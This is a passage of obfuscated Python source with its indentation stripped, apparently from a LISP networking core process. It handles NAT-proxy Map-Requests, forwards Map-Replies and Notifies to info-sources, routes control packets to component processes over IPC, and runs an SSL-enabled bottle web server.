def OooO00oO ( addr_str , port , nonce ) :
if ( addr_str != None ) :
for OOoOOOo0 in lisp . lisp_info_sources_by_address . values ( ) :
oOoO00O = OOoOOOo0 . address . print_address_no_iid ( )
if ( oOoO00O == addr_str and OOoOOOo0 . port == port ) :
return ( OOoOOOo0 )
if 31 - 31: ooOoO0o . OoOoOO00 % OoOoOO00 % Oo0Ooo % I1IiiI * iII111i
if 22 - 22: I11i % IiII . OoOoOO00 / ooOoO0o + OOooOOo
return ( None )
if 85 - 85: I1IiiI - ooOoO0o % Oo0Ooo % II111iiii - OoooooooOO % IiII
if 40 - 40: Ii1I
if ( nonce != None ) :
if ( nonce not in lisp . lisp_info_sources_by_nonce ) : return ( None )
return ( lisp . lisp_info_sources_by_nonce [ nonce ] )
if 59 - 59: I11i * OoooooooOO + OOooOOo . iIii1I11I1II1 / i1IIi
return ( None )
if 75 - 75: I11i . OOooOOo - iIii1I11I1II1 * OoO0O00 * iII111i
if 93 - 93: ooOoO0o
if 18 - 18: ooOoO0o
if 66 - 66: oO0o * i11iIiiIii + OoOoOO00 / OOooOOo
if 96 - 96: OOooOOo + OOooOOo % IiII % OOooOOo
if 28 - 28: iIii1I11I1II1 + OoOoOO00 . o0oOOo0O0Ooo % i11iIiiIii
if 58 - 58: I11i / OoooooooOO % oO0o + OoO0O00
if 58 - 58: O0
def O0oO ( lisp_sockets , info_source , packet ) :
if 54 - 54: o0oOOo0O0Ooo + I11i - iIii1I11I1II1 % ooOoO0o % IiII
if 19 - 19: I1ii11iIi11i / iIii1I11I1II1 % i1IIi . OoooooooOO
if 57 - 57: ooOoO0o . Oo0Ooo - OoO0O00 - i11iIiiIii * I1Ii111 / o0oOOo0O0Ooo
if 79 - 79: I1ii11iIi11i + o0oOOo0O0Ooo % Oo0Ooo * o0oOOo0O0Ooo
iiii11IiIiI = lisp . lisp_ecm ( 0 )
packet = iiii11IiIiI . decode ( packet )
if ( packet == None ) :
lisp . lprint ( "Could not decode ECM packet" )
return ( True )
if 8 - 8: I1Ii111 + OoO0O00
if 9 - 9: OOooOOo + o0oOOo0O0Ooo
ooO0000o00O = lisp . lisp_control_header ( )
if ( ooO0000o00O . decode ( packet ) == None ) :
lisp . lprint ( "Could not decode control header" )
return ( True )
if 8 - 8: OOooOOo * Oo0Ooo / iII111i - OoO0O00 - OoooooooOO
if ( ooO0000o00O . type != lisp . LISP_MAP_REQUEST ) :
lisp . lprint ( "Received ECM without Map-Request inside" )
return ( True )
if 100 - 100: oO0o . iIii1I11I1II1 . iIii1I11I1II1
if 55 - 55: oO0o
if 37 - 37: IiII / i11iIiiIii / Oo0Ooo
if 97 - 97: I1Ii111 . I11i / I1IiiI
if 83 - 83: I11i - I1ii11iIi11i * oO0o
oOO00OO0OooOo = lisp . lisp_map_request ( )
packet = oOO00OO0OooOo . decode ( packet , None , 0 )
ii111iI1i1 = oOO00OO0OooOo . nonce
OO000 = info_source . address . print_address_no_iid ( )
if 31 - 31: OoO0O00 * O0 / I11i . OoooooooOO * I11i . I1ii11iIi11i
if 50 - 50: OoO0O00 * I11i - o0oOOo0O0Ooo + IiII * OoO0O00 % oO0o
if 92 - 92: I11i % i1IIi % ooOoO0o % IiII % o0oOOo0O0Ooo
if 61 - 61: OOooOOo * o0oOOo0O0Ooo * O0 / iII111i
oOO00OO0OooOo . print_map_request ( )
if 52 - 52: Oo0Ooo + iIii1I11I1II1 + i1IIi * Ii1I - II111iiii . II111iiii
lisp . lprint ( "Process {} from info-source {}, port {}, nonce 0x{}" . format ( lisp . bold ( "nat-proxy Map-Request" , False ) ,
# I1ii11iIi11i % i1IIi
lisp . red ( OO000 , False ) , info_source . port ,
lisp . lisp_hex_string ( ii111iI1i1 ) ) )
if 31 - 31: iII111i - OoOoOO00 . OoOoOO00 - oO0o + Oo0Ooo / i11iIiiIii
if 90 - 90: iIii1I11I1II1 + OoOoOO00
if 9 - 9: iIii1I11I1II1 . OoooooooOO + i1IIi - Oo0Ooo
if 30 - 30: iII111i / OoO0O00 . iII111i
if 17 - 17: Oo0Ooo + OoooooooOO * OoooooooOO
info_source . cache_nonce_for_info_source ( ii111iI1i1 )
if 5 - 5: I1Ii111 % OoooooooOO . OoOoOO00
if 67 - 67: I1ii11iIi11i + Ii1I
if 72 - 72: IiII % o0oOOo0O0Ooo
if 93 - 93: iIii1I11I1II1 + i11iIiiIii . o0oOOo0O0Ooo . i1IIi % I1IiiI % ooOoO0o
if 74 - 74: OoOoOO00 / i1IIi % OoooooooOO
info_source . no_timeout = oOO00OO0OooOo . subscribe_bit
if 52 - 52: IiII % ooOoO0o
if 25 - 25: I11i / I11i % OoooooooOO - I1ii11iIi11i * oO0o
if 23 - 23: i11iIiiIii
if 100 - 100: oO0o + O0 . I1IiiI + i1IIi - OoOoOO00 + o0oOOo0O0Ooo
if 65 - 65: II111iiii / Oo0Ooo
if 42 - 42: i11iIiiIii . O0
for o0oo0Oo in oOO00OO0OooOo . itr_rlocs :
if ( o0oo0Oo . is_local ( ) ) : return ( False )
if 10 - 10: I1ii11iIi11i
if 87 - 87: Oo0Ooo % Ii1I
if 53 - 53: i1IIi - IiII + iIii1I11I1II1
if 75 - 75: I1ii11iIi11i
if 92 - 92: I11i / O0 * I1IiiI - I11i
oooOo00000 = lisp . lisp_myrlocs [ 0 ]
oOO00OO0OooOo . itr_rloc_count = 0
oOO00OO0OooOo . itr_rlocs = [ ]
oOO00OO0OooOo . itr_rlocs . append ( oooOo00000 )
if 45 - 45: O0 * I1Ii111 + i11iIiiIii - OOooOOo - iIii1I11I1II1
packet = oOO00OO0OooOo . encode ( None , 0 )
oOO00OO0OooOo . print_map_request ( )
if 5 - 5: OOooOOo % Oo0Ooo % IiII % ooOoO0o
I1Iiii = oOO00OO0OooOo . target_eid
if ( I1Iiii . is_ipv6 ( ) ) :
I1I1Iii1Iiii = lisp . lisp_myrlocs [ 1 ]
if ( I1I1Iii1Iiii != None ) : oooOo00000 = I1I1Iii1Iiii
if 4 - 4: IiII
if 93 - 93: oO0o % i1IIi
if 83 - 83: I1IiiI . Oo0Ooo - I11i . o0oOOo0O0Ooo
if 73 - 73: I1IiiI - iII111i . iII111i
if 22 - 22: ooOoO0o / ooOoO0o - Ii1I % I11i . OOooOOo + IiII
OooO00oo0O0 = lisp . lisp_is_running ( "lisp-ms" )
lisp . lisp_send_ecm ( lisp_sockets , packet , I1Iiii , lisp . LISP_CTRL_PORT ,
I1Iiii , oooOo00000 , to_ms = OooO00oo0O0 , ddt = False )
return ( True )
if 10 - 10: IiII / OoooooooOO
if 50 - 50: i11iIiiIii - OoooooooOO . oO0o + O0 . i1IIi
if 91 - 91: o0oOOo0O0Ooo . iII111i % Oo0Ooo - iII111i . oO0o % i11iIiiIii
if 25 - 25: iIii1I11I1II1
if 63 - 63: ooOoO0o
if 96 - 96: I11i
if 34 - 34: OoOoOO00 / OoO0O00 - I1IiiI . O0 . OOooOOo
if 63 - 63: iII111i
if 11 - 11: iII111i - iIii1I11I1II1
def ooOo0O0 ( lisp_sockets , info_source , packet , mr_or_mn ) :
OO000 = info_source . address . print_address_no_iid ( )
o0o = info_source . port
ii111iI1i1 = info_source . nonce
if 83 - 83: OoooooooOO
mr_or_mn = "Reply" if mr_or_mn else "Notify"
mr_or_mn = lisp . bold ( "nat-proxy Map-{}" . format ( mr_or_mn ) , False )
if 12 - 12: ooOoO0o
lisp . lprint ( "Forward {} to info-source {}, port {}, nonce 0x{}" . format ( mr_or_mn , lisp . red ( OO000 , False ) , o0o ,
# iIii1I11I1II1 - I1Ii111 * IiII
lisp . lisp_hex_string ( ii111iI1i1 ) ) )
if 61 - 61: I1ii11iIi11i - OOooOOo
if 16 - 16: iII111i / iIii1I11I1II1 + OOooOOo * iII111i * I11i
if 8 - 8: I1Ii111
if 15 - 15: Oo0Ooo / Ii1I % O0 + I1ii11iIi11i
o0oi1I1I1I = lisp . lisp_convert_4to6 ( OO000 )
lisp . lisp_send ( lisp_sockets , o0oi1I1I1I , o0o , packet )
if 25 - 25: o0oOOo0O0Ooo + iII111i - Oo0Ooo
if 59 - 59: OOooOOo - I11i % i1IIi
if 1 - 1: I1ii11iIi11i . I1Ii111 * I1IiiI . IiII * II111iiii % iIii1I11I1II1
if 86 - 86: i1IIi * O0 % ooOoO0o . Oo0Ooo % ooOoO0o . Oo0Ooo
if 71 - 71: iII111i . i11iIiiIii * O0 + O0
if 57 - 57: OoooooooOO . I11i % II111iiii % I1IiiI + Ii1I
if 70 - 70: IiII . i11iIiiIii
def O0O00O0Oo0 ( lisp_sockets , source , sport , packet ) :
global O0OOo
if 53 - 53: i1IIi . i1IIi - I11i / iII111i - OoOoOO00 % I1IiiI
ooO0000o00O = lisp . lisp_control_header ( )
if ( ooO0000o00O . decode ( packet ) == None ) :
lisp . lprint ( "Could not decode control header" )
return
if 65 - 65: iII111i . OoooooooOO - O0 . iII111i - i11iIiiIii
if 29 - 29: I1ii11iIi11i . I1IiiI % oO0o - i11iIiiIii
if 27 - 27: I1ii11iIi11i - i11iIiiIii % I1Ii111 / Oo0Ooo . Oo0Ooo / OoooooooOO
if 76 - 76: I11i * OoO0O00 . iIii1I11I1II1 % OoooooooOO % I1ii11iIi11i
if 39 - 39: II111iiii * OoOoOO00 . O0 * I11i
if 89 - 89: Ii1I - ooOoO0o . I11i - I1Ii111 - I1IiiI
if 79 - 79: IiII + IiII + Ii1I
if 39 - 39: O0 - OoooooooOO
if 63 - 63: iIii1I11I1II1 % o0oOOo0O0Ooo * ooOoO0o
if 79 - 79: O0
if ( ooO0000o00O . type == lisp . LISP_NAT_INFO ) :
if ( ooO0000o00O . info_reply == False ) :
lisp . lisp_process_info_request ( lisp_sockets , packet , source , sport ,
lisp . lisp_ms_rtr_list )
if 32 - 32: II111iiii . O0 + Ii1I / OoOoOO00 / IiII / OOooOOo
return
if 15 - 15: I1ii11iIi11i
if 4 - 4: IiII + iIii1I11I1II1 * iII111i + Oo0Ooo * o0oOOo0O0Ooo % II111iiii
OO0o0o0oo = packet
packet = lisp . lisp_packet_ipc ( packet , source , sport )
if 40 - 40: Oo0Ooo
if 47 - 47: OoOoOO00
if 65 - 65: O0 + I1Ii111 % Ii1I * I1IiiI / ooOoO0o / OoOoOO00
if 71 - 71: i11iIiiIii / OoOoOO00 . oO0o
if ( ooO0000o00O . type in ( lisp . LISP_MAP_REGISTER , lisp . LISP_MAP_NOTIFY_ACK ) ) :
lisp . lisp_ipc ( packet , O0OOo , "lisp-ms" )
return
if 33 - 33: oO0o
if 39 - 39: OoO0O00 + O0 + ooOoO0o * II111iiii % O0 - O0
if 41 - 41: IiII % o0oOOo0O0Ooo
if 67 - 67: O0 % I1Ii111
if 35 - 35: I1IiiI . OoOoOO00 + OoooooooOO % Oo0Ooo % OOooOOo
if ( ooO0000o00O . type == lisp . LISP_MAP_REPLY ) :
iIi1Ii1111i = lisp . lisp_map_reply ( )
iIi1Ii1111i . decode ( OO0o0o0oo )
if 16 - 16: IiII . ooOoO0o . OoO0O00
OOoOOOo0 = OooO00oO ( None , 0 , iIi1Ii1111i . nonce )
if ( OOoOOOo0 ) :
ooOo0O0 ( lisp_sockets , OOoOOOo0 , OO0o0o0oo , True )
else :
iIIi1Ii1III = "/tmp/lisp-lig"
if ( os . path . exists ( iIIi1Ii1III ) ) :
lisp . lisp_ipc ( packet , O0OOo , iIIi1Ii1III )
else :
lisp . lisp_ipc ( packet , O0OOo , "lisp-itr" )
if 53 - 53: OoOoOO00
if 84 - 84: OoO0O00
return
if 97 - 97: i1IIi
if 98 - 98: OoooooooOO - I1IiiI + ooOoO0o
if 98 - 98: iII111i . IiII . IiII - OOooOOo
if 65 - 65: Oo0Ooo + o0oOOo0O0Ooo - Ii1I
if 12 - 12: OoooooooOO + I1ii11iIi11i
if ( ooO0000o00O . type == lisp . LISP_MAP_NOTIFY ) :
o0OoO0000oOO = lisp . lisp_map_notify ( lisp_sockets )
o0OoO0000oOO . decode ( OO0o0o0oo )
if 42 - 42: I1Ii111 % OoO0O00 . I1ii11iIi11i
OOoOOOo0 = OooO00oO ( None , 0 , o0OoO0000oOO . nonce )
if ( OOoOOOo0 ) :
ooOo0O0 ( lisp_sockets , OOoOOOo0 , OO0o0o0oo ,
False )
else :
iIIi1Ii1III = "/tmp/lisp-lig"
if ( os . path . exists ( iIIi1Ii1III ) ) :
lisp . lisp_ipc ( packet , O0OOo , iIIi1Ii1III )
else :
i11IiIIi11I = "lisp-rtr" if lisp . lisp_is_running ( "lisp-rtr" ) else "lisp-etr"
if 4 - 4: i1IIi + OoOoOO00
lisp . lisp_ipc ( packet , O0OOo , i11IiIIi11I )
if 39 - 39: iIii1I11I1II1 + ooOoO0o
if 92 - 92: I11i % i11iIiiIii % Oo0Ooo
return
if 23 - 23: II111iiii * iII111i
if 80 - 80: I1Ii111 / i11iIiiIii + OoooooooOO
if 38 - 38: I1ii11iIi11i % ooOoO0o + i1IIi * OoooooooOO * oO0o
if 83 - 83: iIii1I11I1II1 - ooOoO0o - I1Ii111 / OoO0O00 - O0
if 81 - 81: Ii1I - oO0o * I1ii11iIi11i / I1Ii111
if 21 - 21: OoO0O00
if ( ooO0000o00O . type == lisp . LISP_MAP_REFERRAL ) :
Ooo000O00 = "/tmp/lisp-rig"
if ( os . path . exists ( Ooo000O00 ) ) :
lisp . lisp_ipc ( packet , O0OOo , Ooo000O00 )
else :
lisp . lisp_ipc ( packet , O0OOo , "lisp-mr" )
if 63 - 63: I11i . O0 * I11i + iIii1I11I1II1
return
if 46 - 46: i1IIi + II111iiii * i1IIi - Ii1I
if 79 - 79: II111iiii - oO0o * I1ii11iIi11i - OoOoOO00 . I1ii11iIi11i
if 11 - 11: O0 * OoOoOO00
if 37 - 37: OoOoOO00 + O0 . O0 * Oo0Ooo % I1Ii111 / iII111i
if 18 - 18: OoooooooOO
if 57 - 57: ooOoO0o . OoOoOO00 * o0oOOo0O0Ooo - OoooooooOO
if ( ooO0000o00O . type == lisp . LISP_MAP_REQUEST ) :
i11IiIIi11I = "lisp-itr" if ( ooO0000o00O . is_smr ( ) ) else "lisp-etr"
if 75 - 75: i11iIiiIii / o0oOOo0O0Ooo . IiII . i1IIi . i1IIi / I11i
if 94 - 94: ooOoO0o + I1IiiI
if 56 - 56: OoOoOO00 % o0oOOo0O0Ooo
if 40 - 40: OOooOOo / IiII
if 29 - 29: Ii1I - Ii1I / ooOoO0o
if ( ooO0000o00O . rloc_probe ) : return
if 49 - 49: I11i + oO0o % OoO0O00 - Oo0Ooo - O0 - OoooooooOO
lisp . lisp_ipc ( packet , O0OOo , i11IiIIi11I )
return
if 4 - 4: II111iiii - oO0o % Oo0Ooo * i11iIiiIii
if 18 - 18: Oo0Ooo % O0
if 66 - 66: iIii1I11I1II1 % i11iIiiIii / I1IiiI
if 47 - 47: I1ii11iIi11i * oO0o + iIii1I11I1II1 - oO0o / IiII
if 86 - 86: IiII
if 43 - 43: I1IiiI / iII111i / ooOoO0o + iIii1I11I1II1 + OoooooooOO
if 33 - 33: II111iiii - IiII - ooOoO0o
if 92 - 92: OoO0O00 * IiII
if ( ooO0000o00O . type == lisp . LISP_ECM ) :
OOoOOOo0 = OooO00oO ( source , sport , None )
if ( OOoOOOo0 ) :
if ( O0oO ( lisp_sockets , OOoOOOo0 ,
OO0o0o0oo ) ) : return
if 92 - 92: oO0o
if 7 - 7: iII111i
i11IiIIi11I = "lisp-mr"
if ( ooO0000o00O . is_to_etr ( ) ) :
i11IiIIi11I = "lisp-etr"
elif ( ooO0000o00O . is_to_ms ( ) ) :
i11IiIIi11I = "lisp-ms"
elif ( ooO0000o00O . is_ddt ( ) ) :
if ( lisp . lisp_is_running ( "lisp-ddt" ) ) :
i11IiIIi11I = "lisp-ddt"
elif ( lisp . lisp_is_running ( "lisp-ms" ) ) :
i11IiIIi11I = "lisp-ms"
if 73 - 73: OoO0O00 % I1ii11iIi11i
elif ( lisp . lisp_is_running ( "lisp-mr" ) == False ) :
i11IiIIi11I = "lisp-etr"
if 32 - 32: OOooOOo + iII111i + iIii1I11I1II1 * Oo0Ooo
lisp . lisp_ipc ( packet , O0OOo , i11IiIIi11I )
if 62 - 62: i11iIiiIii
return
if 2 - 2: I1IiiI
if 69 - 69: OoooooooOO / Oo0Ooo * I1Ii111
if 99 - 99: II111iiii * iIii1I11I1II1 % O0 * oO0o / II111iiii % OoooooooOO
if 14 - 14: IiII . IiII % ooOoO0o
if 42 - 42: o0oOOo0O0Ooo . OOooOOo - ooOoO0o
if 33 - 33: II111iiii / O0 / IiII - I11i - i1IIi
if 8 - 8: i11iIiiIii . iII111i / iIii1I11I1II1 / I1ii11iIi11i / IiII - Ii1I
if 32 - 32: o0oOOo0O0Ooo . i1IIi * Oo0Ooo
if 98 - 98: Ii1I - II111iiii / I1IiiI . oO0o * IiII . I11i
if 25 - 25: i11iIiiIii / OoOoOO00 - I1Ii111 / OoO0O00 . o0oOOo0O0Ooo . o0oOOo0O0Ooo
if 6 - 6: oO0o . I11i
if 43 - 43: I1ii11iIi11i + o0oOOo0O0Ooo
class iI1iiiiiii ( bottle . ServerAdapter ) :
def run ( self , hand ) :
Oo00oo = "./lisp-cert.pem"
if 79 - 79: I1ii11iIi11i / O0 % o0oOOo0O0Ooo
if 71 - 71: I1Ii111 / I1IiiI / O0
if 19 - 19: i11iIiiIii . I1IiiI + II111iiii / OOooOOo . I1ii11iIi11i * ooOoO0o
if 59 - 59: iIii1I11I1II1 / I1ii11iIi11i % ooOoO0o
if 84 - 84: iIii1I11I1II1 / I1IiiI . OoOoOO00 % I11i
if ( os . path . exists ( Oo00oo ) == False ) :
os . system ( "cp ./lisp-cert.pem.default {}" . format ( Oo00oo ) )
lisp . lprint ( ( "{} does not exist, creating a copy from lisp-" + "cert.pem.default" ) . format ( Oo00oo ) )
if 99 - 99: Oo0Ooo + i11iIiiIii
if 36 - 36: Ii1I * I1Ii111 * iIii1I11I1II1 - I11i % i11iIiiIii
if 98 - 98: iIii1I11I1II1 - i1IIi + ooOoO0o % I11i + ooOoO0o / oO0o
O0O0Oo00OO = wsgi_server ( ( self . host , self . port ) , hand )
O0O0Oo00OO . ssl_adapter = ssl_adaptor ( Oo00oo , Oo00oo , None )
try :
O0O0Oo00OO . start ( )
finally :
O0O0Oo00OO . stop ( )
if 100 - 100: o0oOOo0O0Ooo . I1IiiI
if 62 - 62: ooOoO0o + II111iiii % ooOoO0o
if 50 - 50: OoooooooOO + oO0o * I1IiiI - Ii1I / i11iIiiIii
if 5 - 5: O0 - I1IiiI
if 44 - 44: II111iiii . II111iiii + OOooOOo * Ii1I
if 16 - 16: II111iiii
if 100 - 100: O0 - i1IIi
if 48 - 48: oO0o % ooOoO0o + O0
if 27 - 27: I1ii11iIi11i / OOooOOo
if 33 - 33: OoooooooOO % I1ii11iIi11i . O0 / I1ii11iIi11i
if 63 - 63: IiII + iIii1I11I1II1 + I1IiiI + I1Ii111
if 72 - 72: OoO0O00 + i11iIiiIii + I1ii11iIi11i
if 96 - 96: oO0o % i1IIi / o0oOOo0O0Ooo
if 13 - 13: II111iiii - Oo0Ooo % i11iIiiIii + iII111i
if 88 - 88: O0 . oO0o % I1IiiI
if 10 - 10: I1IiiI + O0
def Oooo0Oo00o ( bottle_port ) :
lisp . lisp_set_exception ( )
if 32 - 32: OoOoOO00 . iIii1I11I1II1 % oO0o . O0 . OoOoOO00 / iII111i
if 45 - 45: iIii1I11I1II1
if 41 - 41: iII111i % iII111i - IiII % OoO0O00 - OoooooooOO - iII111i
if 66 - 66: o0oOOo0O0Ooo % OoOoOO00
if 30 - 30: OoOoOO00 * Oo0Ooo % iIii1I11I1II1 % OoO0O00 + i11iIiiIii
if ( bottle_port < 0 ) :
bottle . run ( host = "0.0.0.0" , port = - bottle_port )
return
if 46 - 46: I1IiiI . IiII - i11iIiiIii - I1Ii111
if 97 - 97: II111iiii % Oo0Ooo * IiII
bottle . server_names [ "lisp-ssl-server" ] = iI1iiiiiii
if 51 - 51: Oo0Ooo % OOooOOo . Oo0Ooo
if 72 - 72: Ii1I % Ii1I / I1IiiI
if 40 - 40: Oo0Ooo - OOooOOo + I1Ii111 - o0oOOo0O0Ooo % I1IiiI . ooOoO0o
if 35 - 35: i11iIiiIii + OoooooooOO * iIii1I11I1II1 . I1Ii111
try :
bottle . run ( host = "0.0.0.0" , port = bottle_port , server = "lisp-ssl-server" ,
fast = True )
except :
bottle . run ( host = "0.0.0.0" , port = bottle_port , fast = True )
if 48 - 48: iII111i * i1IIi % OoooooooOO * Ii1I * OoO0O00
return
if 7 - 7: iII111i . Ii1I . iII111i - I1Ii111
if 33 - 33: ooOoO0o + OoooooooOO - OoO0O00 / i1IIi / OoooooooOO
if 82 - 82: I1ii11iIi11i / OOooOOo - iII111i / Oo0Ooo * OoO0O00
if 55 - 55: OoooooooOO
if 73 - 73: OoOoOO00 - I1ii11iIi11i % Oo0Ooo + I1ii11iIi11i - O0 . OoO0O00
if 38 - 38: O0
if 79 - 79: i1IIi . oO0o
if 34 - 34: I1Ii111 * II111iiii
def o0oO00OOo0oO ( ) :
lisp . lisp_set_exception ( )
if 92 - 92: I1IiiI . II111iiii
return
if 34 - 34: o0oOOo0O0Ooo . I1Ii111 % IiII - O0 / I1Ii111
if 91 - 91: i11iIiiIii % I1Ii111 * oO0o - I1ii11iIi11i . I1Ii111
if 28 - 28: i11iIiiIii
if 51 - 51: I1IiiI + ooOoO0o * O0 . Ii1I
if 82 - 82: OOooOOo * I1ii11iIi11i % Ii1I . OOooOOo
if 43 - 43: OoO0O00 . ooOoO0o * Oo0Ooo
if 20 - 20: i1IIi . i1IIi - I11i
if 89 - 89: ooOoO0o - I11i . O0 % OoooooooOO . i11iIiiIii
if 35 - 35: II111iiii / OoOoOO00 - O0 . II111iiii
def oO0o000oOO ( lisp_socket ) :
lisp . lisp_set_exception ( )
ooo0O = { "lisp-itr" : False , "lisp-etr" : False , "lisp-rtr" : False ,
"lisp-mr" : False , "lisp-ms" : False , "lisp-ddt" : False }
if 27 - 27: O0 - I11i * II111iiii - iIii1I11I1II1 / ooOoO0o
while ( True ) :
time . sleep ( 1 )
II1i = ooo0O
ooo0O = { }
if 98 - 98: OoOoOO00 - OoOoOO00 . II111iiii . iII111i + O0
for i11IiIIi11I in II1i :
ooo0O [ i11IiIIi11I ] = lisp . lisp_is_running ( i11IiIIi11I )
if ( II1i [ i11IiIIi11I ] == ooo0O [ i11IiIIi11I ] ) : continue
if 28 - 28: IiII + i11iIiiIii + OoooooooOO / OoO0O00
lisp . lprint ( "*** Process '{}' has {} ***" . format ( i11IiIIi11I ,
"come up" if ooo0O [ i11IiIIi11I ] else "gone down" ) )
if 6 - 6: I1IiiI - i11iIiiIii
if 61 - 61: I1Ii111 * I1ii11iIi11i % I1IiiI % OoO0O00 % I11i + I11i
if 6 - 6: Oo0Ooo
if 73 - 73: I1Ii111 * I1ii11iIi11i + o0oOOo0O0Ooo - Oo0Ooo . I11i
if ( ooo0O [ i11IiIIi11I ] == True ) :
lisp . lisp_ipc_lock . acquire ( )
lispconfig . lisp_send_commands ( lisp_socket , i11IiIIi11I )
lisp . lisp_ipc_lock . release ( )
if 93 - 93: i11iIiiIii
if 80 - 80: i1IIi . I1IiiI - oO0o + OOooOOo + iII111i % oO0o
if 13 - 13: II111iiii / OoOoOO00 / OoOoOO00 + ooOoO0o
return
if 49 - 49: O0 / II111iiii * I1IiiI - OoooooooOO . II111iiii % IiII
if 13 - 13: oO0o . iIii1I11I1II1 . OOooOOo . IiII
if 58 - 58: I11i
if 7 - 7: II111iiii / IiII % I11i + I1IiiI - O0
if 45 - 45: I1IiiI / iII111i + oO0o + IiII
if 15 - 15: I1IiiI % OoO0O00
if 66 - 66: oO0o * i11iIiiIii . I1Ii111
def o0O0OOOo0 ( ) :
lisp . lisp_set_exception ( )
I1ii1i = 60
if 51 - 51: OoO0O00 - iII111i % O0 - OoOoOO00
while ( True ) :
time . sleep ( I1ii1i )
if 53 - 53: iII111i / i1IIi / i1IIi
o0oo00O = [ ]
IIIIII1iI1II = lisp . lisp_get_timestamp ( )
if 14 - 14: I1IiiI / O0
if 43 - 43: oO0o - IiII % i11iIiiIii * II111iiii . I1Ii111 - I11i
if 13 - 13: OoO0O00
if 70 - 70: IiII . I1Ii111 * OoO0O00 + I11i - IiII . IiII
for Ooo0 in lisp . lisp_info_sources_by_address :
OOoOOOo0 = lisp . lisp_info_sources_by_address [ Ooo0 ]
if ( OOoOOOo0 . no_timeout ) : continue
if ( OOoOOOo0 . uptime + I1ii1i < IIIIII1iI1II ) : continue
if 60 - 60: i11iIiiIii * Oo0Ooo % OoO0O00 + OoO0O00
o0oo00O . append ( Ooo0 )
if 84 - 84: iIii1I11I1II1 + OoooooooOO
ii111iI1i1 = OOoOOOo0 . nonce
if ( ii111iI1i1 == None ) : continue
if ( ii111iI1i1 in lisp . lisp_info_sources_by_nonce ) :
lisp . lisp_info_sources_by_nonce . pop ( ii111iI1i1 )
if 77 - 77: O0 * I1ii11iIi11i * oO0o + OoO0O00 + I1ii11iIi11i - I1Ii111
if 10 - 10: I1ii11iIi11i + IiII
if 58 - 58: I1IiiI + OoooooooOO / iII111i . ooOoO0o % o0oOOo0O0Ooo / I1ii11iIi11i
if 62 - 62: II111iiii
if 12 - 12: IiII + II111iiii
if 92 - 92: I1Ii111 % iIii1I11I1II1 - iII111i / i11iIiiIii % ooOoO0o * o0oOOo0O0Ooo
for Ooo0 in o0oo00O :
lisp . lisp_info_sources_by_address . pop ( Ooo0 )
if 80 - 80: iII111i
if 3 - 3: I1ii11iIi11i * I11i
return
if 53 - 53: iIii1I11I1II1 / iII111i % OoO0O00 + IiII / ooOoO0o
if 74 - 74: Oo0Ooo
if 8 - 8: I1IiiI % II111iiii - o0oOOo0O0Ooo - I11i % I1IiiI
if 93 - 93: Ii1I * iII111i / OOooOOo
if 88 - 88: oO0o
if 1 - 1: Oo0Ooo
if 95 - 95: OoooooooOO / I11i % OoooooooOO / ooOoO0o * IiII
if 75 - 75: O0
def oOoO ( lisp_ipc_control_socket , lisp_sockets ) :
lisp . lisp_set_exception ( )
while ( True ) :
try : OOooooO = lisp_ipc_control_socket . recvfrom ( 9000 )
except : return ( [ "" , "" , "" , "" ] )
O000oo = OOooooO [ 0 ] . split ( "@" )
II11iIiIIIiI = OOooooO [ 1 ]
if 80 - 80: OoOoOO00 + iIii1I11I1II1 . IiII
O0OOO = O000oo [ 0 ]
o0oi1I1I1I = O000oo [ 1 ]
o0o = int ( O000oo [ 2 ] )
ooOoOoo000O0O = O000oo [ 3 : : ]
if 42 - 42: o0oOOo0O0Ooo / IiII
if ( len ( ooOoOoo000O0O ) > 1 ) :
ooOoOoo000O0O = lisp . lisp_bit_stuff ( ooOoOoo000O0O )
else :
ooOoOoo000O0O = ooOoOoo000O0O [ 0 ]
if 79 - 79: Ii1I
if 27 - 27: OoO0O00 + Oo0Ooo
if ( O0OOO != "control-packet" ) :
lisp . lprint ( ( "lisp_core_control_packet_process() received" + "unexpected control-packet, message ignored" ) )
if 92 - 92: I1IiiI % iII111i
continue
if 31 - 31: OoooooooOO - oO0o / I1Ii111
if 62 - 62: i11iIiiIii - I11i
lisp . lprint ( ( "{} {} bytes from {}, dest/port: {}/{}, control-" + "packet: {}" ) . format ( lisp . bold ( "Receive" , False ) , len ( ooOoOoo000O0O ) ,
# I11i . Ii1I * OOooOOo - Oo0Ooo - OoooooooOO
II11iIiIIIiI , o0oi1I1I1I , o0o , lisp . lisp_format_packet ( ooOoOoo000O0O ) ) )
if 16 - 16: i1IIi * I1Ii111 % i1IIi / I11i
if 95 - 95: i11iIiiIii
if 95 - 95: Oo0Ooo
if 49 - 49: I1IiiI
if 24 - 24: II111iiii / Ii1I . iIii1I11I1II1 - II111iiii % O0
if 8 - 8: OoO0O00 % iII111i . OoooooooOO - Ii1I % OoooooooOO
ooO0000o00O = lisp . lisp_control_header ( )
ooO0000o00O . decode ( ooOoOoo000O0O )
if ( ooO0000o00O . type == lisp . LISP_MAP_REPLY ) :
iIi1Ii1111i = lisp . lisp_map_reply ( )
iIi1Ii1111i . decode ( ooOoOoo000O0O )
if ( OooO00oO ( None , 0 , iIi1Ii1111i . nonce ) ) :
O0O00O0Oo0 ( lisp_sockets , II11iIiIIIiI , o0o , ooOoOoo000O0O )
continue
if 61 - 61: o0oOOo0O0Ooo / i11iIiiIii
if 28 - 28: OOooOOo / OoOoOO00
if 30 - 30: ooOoO0o
if 57 - 57: o0oOOo0O0Ooo * i11iIiiIii / OoOoOO00
if 40 - 40: iIii1I11I1II1 - ooOoO0o / Oo0Ooo
if 24 - 24: oO0o - iII111i / ooOoO0o
if 10 - 10: OoOoOO00 * i1IIi
if 15 - 15: I11i + i1IIi - II111iiii % I1IiiI
if ( ooO0000o00O . type == lisp . LISP_MAP_NOTIFY and II11iIiIIIiI == "lisp-etr" ) :
i11I1iIiII = lisp . lisp_packet_ipc ( ooOoOoo000O0O , II11iIiIIIiI , o0o )
lisp . lisp_ipc ( i11I1iIiII , O0OOo , "lisp-itr" )
continue
if 34 - 34: I1IiiI
if 57 - 57: OOooOOo . Ii1I % o0oOOo0O0Ooo
if 32 - 32: I11i / IiII - O0 * iIii1I11I1II1
if 70 - 70: OoooooooOO % OoooooooOO % OoO0O00
if 98 - 98: OoO0O00
if 18 - 18: I11i + Oo0Ooo - OoO0O00 / I1Ii111 / OOooOOo
if 53 - 53: OOooOOo + o0oOOo0O0Ooo . oO0o / I11i
OOOO = lisp . lisp_convert_4to6 ( o0oi1I1I1I )
OOOO = lisp . lisp_address ( lisp . LISP_AFI_IPV6 , "" , 128 , 0 )
